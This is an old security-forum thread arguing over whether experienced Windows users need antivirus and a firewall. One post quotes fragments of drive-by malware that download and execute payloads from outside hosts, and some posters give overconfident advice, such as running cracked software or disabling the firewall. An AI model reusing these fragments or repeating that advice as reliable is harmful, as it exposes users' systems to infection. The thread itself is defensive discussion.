I'm an advanced windows user. Shoud I still use a firewall and AV?

Some people say advanced users do not need antivirus and firewall. Is it true? I don't use Internet Explorer.

well an advanced user could be different from a safe surfer. either way, i think u should stay with an AV and FW.

if u have a router/firewall maybe u could ditch ur FW, but ur security setup rele depends on what ur comfortable with.

Unfortunately, there are also advanced bad guys ...

How do you stop that someone enter on your system if you don't have a firewall to stop them?

If you only navigate on the white side of the web, you can avoid AV, but it's a potential risk that you will have...

There are no 'advanced' users only people who can and will make mistakes.
Knowing how to push all the buttons in windows is nice but it won't keep you safe from exploits, even if you would have a degree in computerscience, you'd still make mistakes.
Use at least a firewall when you're not behind a NAT-router, without it the system is wide open.

regards
Lamehand

Well, I p2p, I surf on crack sites... but ad-aware did not catch anything!

-{ Quote: "Well, I p2p, I surf on crack sites... but ad-aware did not catch anything!" }-The same could be said regarding almost any similar anti-spyware program in regards to simply surfing. What did you feel Adaware should have actually caught :-\

-{ Quote: "Well, I p2p, I surf on crack sites... but ad-aware did not catch anything!" }-
I wonder how you know for sure that your computer isn't infected after surfing on crack sites?
Because Ad-Aware didn't find anything? I wouldn't even sure about that after running 10 scanners.

Why do you need to visit crack sites anyway? To find cracks for downloaded legitimate softwares in order not to have to buy them? That's theft, don't you know that? You need education, stick around.

Could be part of a botnet already, could be a menace to other net users without even knowing it.
Crack-sites are not the places to visit for an advanced user, advanced users take their responsabillity and act accordingly.
That is why advanced users implement a layered defense on their system, that means; the use of more then one anti-spyware application, a good firewall, possibly an anti-trojan app. and ofcourse antivirus software.
Next to this basic things one could invest in HIPS or IDS software.
The best thing one can do is to practice safe hex, that means not going to bad sites, not downloading all kinds of crap, in general use common sense, it's about 90% of your protection.

Lamehand

Makes me wonder why a supposedly 'advanced' Windows user would even need to be taught about the serious lack of "native" protection in Windows and the 'bad' nature of most "crackz" sites. ::)

-{ Quote: "Crack-sites are not the places to visit for an advanced user, advanced users take their responsabillity and act accordingly.
That is why advanced users implement a layered defense on their system, that means; the use of more then one anti-spyware application, a " }-
so if i visit crack sites and use a layered defense, what would that make me?

anyways i think being educated is a very good way of not getting infected even if u practice dangerous hex (p2p, pr0n, etc).

WSFuser, to answer your question, i think you would be someone visiting a crack- site, what makes the difference is what you want to do there.
I didn't mean to say that one should load up on security applications just to be able to use crack-sites in a safe manner.

regards
Lamehand

-{ Quote: "WSFuser, to answer your question, i think you would be someone visiting a crack- site, what makes the difference is what you want to do there." }-
so it wouldnt make me any less of an advanced user, nah? (dont respond)

Hello,
First, to answer the question:
Firewall is a nice thing to have, if you like to know what traffic goes on about your computers. You can manage without it - provided you know what to do - but as you say you're advanced, so you probably know how to handle things.
Anti-virus can be nice, but most people make a mistake with AV - they think it's supposed to protect them from bad people. No no no! AV protects against good people. If you download a file from a cracks site and run it on your pc, you can never be 100% sure you did not make a small mistake on the way. And if there's doubt, there's no doubt. As simple as that. If you 'feel' the file might be unsafe - don't run it!
Then come your friends. You get a file from a friend, a trusted source. This one you want to check with your AV. Many people disregard threats from trusted sources, because they trust the sources. If you get an executable from your friend, make sure your friend has not made a mistake.
If you have money and time, set a spare machine that will be used as a scapegoat for testing. For installations, virus checks etc.
Second, about crack sites and dangers pertaining to crack sites.
Just because someone visited a site does not mean he / she is infected instantly. Crack sites might contain bad stuff, but they are not evil things that just wait to eat your computer. They are just another series of sites where you can find bad things, alongside chats, porn sites - or just plain sites you might trust. Hey, people who bought music disks from Sony did not expect to get infected, did they?
On the contrary, when you visit the crack sites, you're alert. Trouble comes from supposedly benign and trusted sites.
Now, as to the danger, browsing in a non-IE browser with plugins turned off, there's no exploit that can break through. None whatsoever.
As to the morality of this - well, why should not one visit these sites? How are they different from other sites? If I visit a cracks site, does that mean I use pirated software? No. On the contrary! If I visit a porn site, does that make me a perv ... yes ... :)
Anyhow, back on topic, firewall is nice, in my opinion, AV can be fine if you like to be in control (supposedly). But if you want to be in control even more, then you should definitely explore the more advanced fields of the Windows, which are restriction policies and whatnot.
Mrk

-{ Quote: "I'm an advanced windows user. Shoud I still use a firewall and AV?" }-I'm not sure what you mean by an "advanced" user. For me, there should be only one type of user: one who is taught, and subsequently utilizes, safe computing habits. This user understands how a computer becomes infected, and how to prevent that from happening.

Assuming this is what you mean, I would answer, no, with some qualifications.

Firewall

Using Win98? Not necessary. I never used one, and I still take care of three systems running Win98 w/o one. It's easy to close the ports. No one ever had any qualms about closed ports until someone came along and decided it is necessary to run Stealth.

Now, with Win2000/XP, it's a bit trickier because of Services, but it can be done, as I and others proved back when BBC produced that clip showing how quickly a system could be infected running w/o a firewall. That was the silliest, most misleading demo I've ever seen. Who would connect a computer to the internet right out of the box?

But for the typical home user I encounter, it's safer and less bothersome to use a firewall. So for my Win2k friends, we install one, and for those with WinXP, we activate the built-in firewall.

AV

Not necessary if you understand how a computer gets infected. AV just isn't reliable, as many of the recent malware exploits have proven. There are other ways to prevent the unexpected/inadvertant mishap.

-{ Quote: "Well, I p2p, I surf on crack sites... but ad-aware did not catch anything!" }-Oops, now we're in different territory.

Crack sites? That doesn't fit the description of the typical users I encounter, so I have no advice here. One is usually left to flounder helplessly in those waters, never knowing what lies around the next rock, wondering why AV/Adware doesn't catch anything, never knowing if something maybe got through.

It may be that the best solution is for you to decide for yourself, based on your perception of threats to your system and what you think will best protect you.

Good success in your endeavors!


__________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "No one ever had any qualms about closed ports until someone came along and decided it is necessary to run Stealth." }-Nice point ;)
-{ Quote: "Who would connect a computer to the internet right out of the box?" }-
Actually, a lot of people do, I'm afraid...
-{ Quote: "But for the typical home user I encounter, it's safer and less bothersome to use a firewall. So for my Win2k friends, we install one, and for those with WinXP, we activate the built-in firewall." }-Sigh of relief :)
-{ Quote: "AV just isn't reliable, as many of the recent malware exploits have proven." }-Not completely reliable, or not able to deal with any type of difficulty, at least. Still useful in many (quite a few thousands, in fact) cases.

WSF, to not answer your question, i used the word 'advanced' a lot on purpose
in a ironic way. :)

There is an other way to secure a computer and that is to install a linux-distro, it's very effective right 'out of the box' without any extra security software.But if you think that is not enough you can always install extra security software.
(I know, i know; 'steep learning curve' and 'not easy to use' and all that stuff, but for me it does the trick.) :)

regards
Lamehand

I still don't know what an advanced user is.
Can I call myself an advanced user or do I have to wait a few more years longer to get this promotion at Wilders ?

At work, we like to give people impressive titles. It's cheaper than a pay rise and they feel themselves more important in the company.
If I can add the word "advanced" to my actual title, people will have more respect for me. ::) ;D

I don´t think i´m an advanced user. I don´t even know programming. Anyway,consider this:

1.I don´t open suspicious files from links like(social engineering): "hey,see my pics below
www. anything.scr or
www. anything.pif or
www. anything.bat
.... ..... ... .vbs
... . ..... .com or
cpl, exe, hta, vbe,vbs...

Ok,it could be masquerade,but it´s simple. I pass my mouse over the link and i see the real content. Firefox is able to avoid automatic download.

2. Yeah,i do use Outlook express. Nowadays there is no bad scripts inside html emails. Besides,I use the preview pane. The 'boom' is social engineering and i know distinguish a pif from a jpg.

3. My SO is configured to show the file extension. That lamers can´t trick me w/ foolishs like "filename.jpg.exe"

4. I don´t accept files from msn messenger buddies( a closer friend,ok. He/she can send me an mp3 or jpg).

5. I search cracks using Firefox or Opera. Download them and send it to kaspersky online file scanner. If the result is ok,I run the crack.

6. I know a program called Petite. It seems a crap,since i don´t see any jpg infected(yahoo mail scans every picture when i have webmail access in my college and I never saw any alert).

7. I scan my PC w/ Kaspersky online scanner and the results are just like "you´re clean".

8. I´m a home user w/ dsl connected 12-18h/day. Nobody has physical access to my computer.

9. I keep my pc updated(windows update) and all my programs.

10. I use Dc++,kazaa lite,torrent programs,etc.

11. I have a Windows CD w/ all patches. Windows xp SP2 included.

Then,I don´t think I need any firewall or anti virus. Serious. Am I wrong? Where are the proofs?

The problem is the ppl think they are free to click on any link,open any file...
They must to know that like the highway rules,there are internet rules too.

Just to shoot a very big hole in your security without AV/FW. have you ever heard of drive by downloads?? with out av or fw you would never know it was happening and once it does happen it could be relativly harmless but that is not likely to be the case. it is your computer,if you don't care about it or care about the probability of spreading malware to everyone you email or im then go ahead run through the mine field blind folded. When your comp get so full of malware and won't boot anymore and it will get infected you might wish you went the other way concerning security.

bigc

P.S.
just remember that you don't have to go looking for malware it will come looking for you. And with out something to stop it, it will just invite itself right on in. And with out the security apps you won't even know it is there until it is to late.

-{ Quote: "
5. I search cracks using Firefox or Opera. Download them and send it to kaspersky online file scanner. If the result is ok,I run the crack.
7. I scan my PC w/ Kaspersky online scanner and the results are just like "you´re clean".
10. I use Dc++,kazaa lite,torrent programs,etc.
Then,I don´t think I need any firewall or anti virus. Serious." }-
Sorry, but what you're really telling us is that you DO use antivirus's quite often , it's just that it's not located on your own machine but rather on an external server. That does not change anything.
-{ Quote: "The problem is the ppl think they are free to click on any link,open any file..." }-I agree with that...
-{ Quote: "They must to know that like the highway rules,there are internet rules too." }-Right, but what scares me is that you seem to wholeheartedly believe you do know all the rules... which are constantly evolving on the web anyway.

As I highlighted just above when talking about AV, one can be pretty sure about whatever, and still not be correct.

Cheers

"When your comp get so full of malware and won't boot anymore and it will get infected you might wish you went the other way concerning security."

How come? Sorry,that´s funny. I don´t use anti virus since 2003 and never used firewall.

-{ Quote: "I don´t use anti virus since 2003 and never used firewall." }-Without Firewall, one could be infected and not even know it, since no monitoring of outgoing connections is performed, nor hasch sizes verifications, and so on.

Perhaps you're a zombie who doesn't even know he's one, hhmmm!? ;)

-{ Quote: "
11. I have a Windows CD w/ all patches. Windows xp SP2 included." }-If you're on XP SP2, then I bet you did not stop the default-enabled inbound firewall, right? In which case, once again, you do run a firewall on your system.

Hello,
Dylan, things don't work that way.
First, a knowledgeable user will know when he's infected, without having to do 10 scans with various softwares.
Second, without firewall, you can be pretty ok. BTW, did you know that while you use programs to communicate across the internet, you open ports? For instance, right now port 80 is open. And if you use torrent or something, for instance port 10554 is open. Does that mean the evil ones are crawling through? No. They need something on the local machine to respond to their calls - a service or something. This service needs to be exploitable. Otherwise, it won't respond to the evil calls of seduction across the internet.
If you have fully patched software, and you know what to do, the services will not be invoked and exploits will not be successfully executed.
Mrk

-{ Quote: ""When your comp get so full of malware and won't boot anymore and it will get infected you might wish you went the other way concerning security."

How come? Sorry,that´s funny. I don´t use anti virus since 2003 and never used firewall." }-


If what you say is true you are a very rare exception. In the real world it just doesn't happen that way. The malware is getting very sophistacated and even specialized apps are having trouble detecting some of it and there is no way you can do it without them. How would you know if you had a rootkit without a specalized detector, you couldn't .

Hi Mrk...
-{ Quote: "If you have fully patched software...
Mrk" }-
No one has. It's never fully patched. It can be fully updated, but that doesn't mean it's actually patched (which would mean "perfect").
And even if it was possible to be perfectly patched, one would still have to go through the trouble of keeping it that way. Technologies evolve - they live and die.

-{ Quote: "Sorry,but what you're really telling us is that you DO use antivirus's quite often , it's just that it's not located on your own machine but rather on an external server. That does not change anything." " }-

Not often,but in some cases like when i download and run cracks and to be sure that my pc is clean. Anyway...My computer says thanks to me,cos there´s not ram consumption regarding anti virus running all the time.


-{ Quote: "Right, but what scares me is that you seem to wholeheartedly believe you do know all the rules... which are constantly evolving on the web anyway." }-

I don´t. I just priorize what is being explored. Social engineering is an example. If a new thread appears,it will be probably (very low) harmless.

-{ Quote: "As I highlighted just above when talking about AV, one can be pretty sure about whatever, and still not be correct.

Cheers" }-

I agree with you. I might be wrong even that kaspersky online scanner says i´m clean.

"Perhaps you're a zombie who doesn't even know he's one, hhmmm!?"

I trust on Kaspersky online scanner and as a second opinion,sometimes I use others(online scanner)

"If you're on XP SP2, then I bet you did not stop the default-enabled inbound firewall, right?"

I did it. I don´t see a concret reason to keep it running and spare my ram.

Cheers

I consider myself as an "advanced" automobile user (driver).
But I always wear my seatbelt and make sure my car insurance is up to date.

-{ Quote: "Well, I p2p, I surf on crack sites... but ad-aware did not catch anything!" }-
If I were you, I would download and run the following to help determine if there are any stealthed rootkits hiding on your computer you don't know about if you are without firewall and AV and have not already done so:

RootkitRevealer v1.7: http://www.sysinternals.com/SecurityUtilities.html
BlackLight: http://www.f-secure.com/blacklight/try.shtml (beta 'til 1 June '06)
RootKitHookAnalyzer: (freeware) http://www.resplendence.com/hookanalyzer (information about)

~removed direct download link to hookanalyzer....Bubba~

-- Tom

-{ Quote: "If a new thread appears,it will be probably (very low) harmless." }-Nobody could agree with that statement you're making. Who can be sure future threads would 'probably' be relatively 'harmless'? No advanced user would ever say such a thing.
-{ Quote: "I might be wrong even that kaspersky online scanner says i´m clean." }-
Incorrect again. I meant to say you were incorrect when stating you never use AV's.
-{ Quote: "Anyway...My computer says thanks to me,cos there´s not ram consumption regarding anti virus running all the time.Cheers" }-You surely don't spare internet bandwidth nor time by online scanning.

-{ Quote: "I always wear my seatbelt and make sure my car insurance is up to date." }-[Well, we'll have to take your word on that ;):D]
Seriously, I agree with what Bob is trying to communicate here. It's these kinds of habits which more than probably contribute to making one an advanced driver and give one some right to call oneself such. Same thing in Cyberworld: intelligent information, well thought-out habits, then -maybe- some right to be called "advanced".

BTW Bob, some digression here...-{ Quote: "I always wear my seatbelt and make sure my car insurance is up to date." }-I know that in Belgium, people are always encouraged to practice safe driving when going out for a 'fiesta' [the party, not the car] by volunteering a 'Bob' (if he's a man) or a 'Bobette' (if a woman) who spends the party enjoying without drinking any drop of alcohol. This way, the whole group knows it can rely on him (her) to safely bring everybody home at the end of the night...I think the names relate to two young belgian comics heroes (http://suskeenwiske.library.uu.nl/intro/fraintro.html)

Cheers

-{ Quote: "Just to shoot a very big hole in your security without AV/FW. have you ever heard of drive by downloads?? with out av or fw you would never know it was happening and once it does happen it could be relativly harmless but that is not likely to be the case. " }-I did say,

"There are other ways to prevent the unexpected/inadvertant mishap."

Here is an old one:


Function InitPaths
Trojan_Path="http://210.0.219.41/cgi-bin/ie0601.cgi?exploit=MS03-032"

http://www.rsjones.net/imgs/rem-1.gif

This had not yet been detected by AV:

http://www.rsjones.net/imgs/rem-1a.gif
_____________________________________________________________


GetProcAddress-LoadLibrary-GetSystemDirectory-
urlmon.dll-URLDownloadToFile-WinExec-
HxxP://195.225.177.33/vx/win32.exe

http://www.rsjones.net/imgs/rem-2.gif
_____________________________________________________________



script sClickUrl = 'http://certified-safe-downloads.com/adserver/RegClean_W0.exe
sTrackingUrl = 'hxxp://certified-safe-downloads.com/


http://www.rsjones.net/imgs/rem-3.gif
_____________________________________________________________

-{ Quote: "P.S.
just remember that you don't have to go looking for malware it will come looking for you. And with out something to stop it, it will just invite itself right on in. And with out the security apps you won't even know it is there until it is to late." }-

Agreed. In answer to the original poster's first post, I'm saying that AV is not necessary, that there are other ways. Then, with his second post, I suggested that he take stock of his own situation and plan accordingly.

The typical users I work with would have very little possibility of encountering these drive-by exploits in the first place, due to the types of sites on which they occur.

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

The only User who does not need an AV, Firewall, and Anti Spy should have no CDROM Drive, no Floppy Drive or USB Ports and no Internet Connection.

Also; the more Advanced a User believes he is , the more tendancy he has to get into trouble.

My Humble Opinion for what it is worth.


The Iceman

MCSE
CNE
CNA
A+
Microsoft Power User

::)

-{ Quote: "The only User who does not need an AV, Firewall, and Anti Spy should have no CDROM Drive, no Floppy Drive or USB Ports and no Internet Connection.

Also; the more Advanced a User believes he is , the more tendancy he has to get into trouble.

My Humble Opinion for what it is worth.


The Iceman

MCSE
CNE
CNA
A+
Microsoft Power User

::)" }-


:thumb: :thumb:

Hello,
I must disagree Iceman.
The more you know the more you get into trouble - correct, but you also know how to get out of trouble. You do not need firewall, av and anti-spy to stay safe. I tell this without arrogance - simple truth of more than 6 years of surfing the net (5 or so on broadband), with lots of porn, p2p and whatnot. And I call myself conservative, because I have friends who do 10 times more daring things than I do and nothing happens.
I do not deny the threat - it's real, it's out there.
But it does not happen magically. You just need to know when and where to be, like in life. Only it's much simpler, because if you don't like something, you hit the reset button and start over. Wish life were so simple eh?

Apropos seat belts, this does not apply! Because you can die in car accident whereas the worst that can happen with computers is 6-7 hours of reformat.

Cheers,
Mrk

-{ Quote: "Nobody could agree with that statement you're making. Who can be sure future threads would 'probably' be relatively 'harmless'? No advanced user would ever say such a thing." }-

Why not? What else could be expected? There´s no much surprise.
And also it´s better living in the present.
But let´s say that a new thread is coming. Wouldn´t you be prepared?
Fact #1: Windows xp is getting old and the lamers/crackers change they focus.
Now do you see any new attack to Windows 95 or Windows 3.1? The focus are Windows 2000/XP/2003(that´s the present since there are a lot of people using it).

Fact #2: MS is making improvements in Windows Vista. Even so I´ll use Windows XP for a long time.

even if a threat is expected, it doesnt make it harmless. theres lots of people whose computers are vulnerable to rootkits, drivers, and other malware.

"advanced" users arent as likely to become infected, but its still better to be safe than sorry.

"Just to shoot a very big hole in your security without AV/FW. have you ever heard of drive by downloads?? with out av or fw you would never know it was happening and once it does happen it could be relativly harmless but that is not likely to be the case."

I know drive by downloads,but I don´t use IE.

-{ Quote: "

I know drive by downloads,but I don´t use IE." }-
Ever heard of java or javascript :lurking:

Alphalutra1

-{ Quote: "Ever heard of java or javascript :lurking:

Alphalutra1" }-

Yes...I don´t like java,it is too slow. That´s why it´s not installed on my firefox.

-{ Quote: "Yes...I don´t like java,it is too slow. That´s why it´s not installed on my firefox." }-
Actually java is faster than c++ :o ;)

Anyhow, I assume that you mean JRE is not installed? Because you can't unistall java from firefox, you can only disable firefox from being able to use it. Also, since you seem to use colors and smilies in your post, then you use javascript ;) (unless you have memorized some bbcode) which is different than java. I would recommend noscript extension to help you out there.

Alphalutra1

An "advanced" user would surely be one able to make their own decisions about the risks they face and how to address them? ;)

It is possible to run a secure system without an anti-virus, provided you use other means to control what programs are allowed to run (e.g. Process Guard, System Safety Monitor, AppDefend, etc). However you do need to ensure that: (a) Windows cannot run any programs without your explicit consent and (b) you are aware of what constitutes "normal" activity on your system and can recognise (and block) anything "abnormal".

A firewall (with good leaktest detection capability) is also important in providing extra information on program behaviour (svchost.exe connecting to windowsupdate.com may be normal but svchost.exe connecting to dsl33-449-1002.randomuser.randomISP.com certainly isn't). While malware doesn't have to connect to the Internet to cause problems, in practice they virtually all do.

-{ Quote: "I'm an advanced windows user. Shoud I still use a firewall and AV?

Some people say advanced users do not need antivirus and firewall. Is it true? I don't use Internet Explorer." }-

Mr. Bond you're on drugs...;D hehehe...:D ;)

Did you know that most of the car accidents happens coz it was drove by "expert car drivers"? They are so confident with their expertise in driving a car that no one can teach them how to slow down and to be careful while driving. Same thing with pc connected to cyber space... :dry: :blink:

Protection is a must whatever and whoever you are, you must always wear condom everytime you visits those unknown places w lots of beautiful babes out there. :-* 8)

I think, there are always some guys out there that are probably more advanced and ahead than you... and they always has the passion of destroying your pc. :-[ :P

So even if you are Mr. Bond, still, you need a Firewall and Anti-virus. An ounce of prevention is more better than a ....cure..(ah whatever...:wacko: )..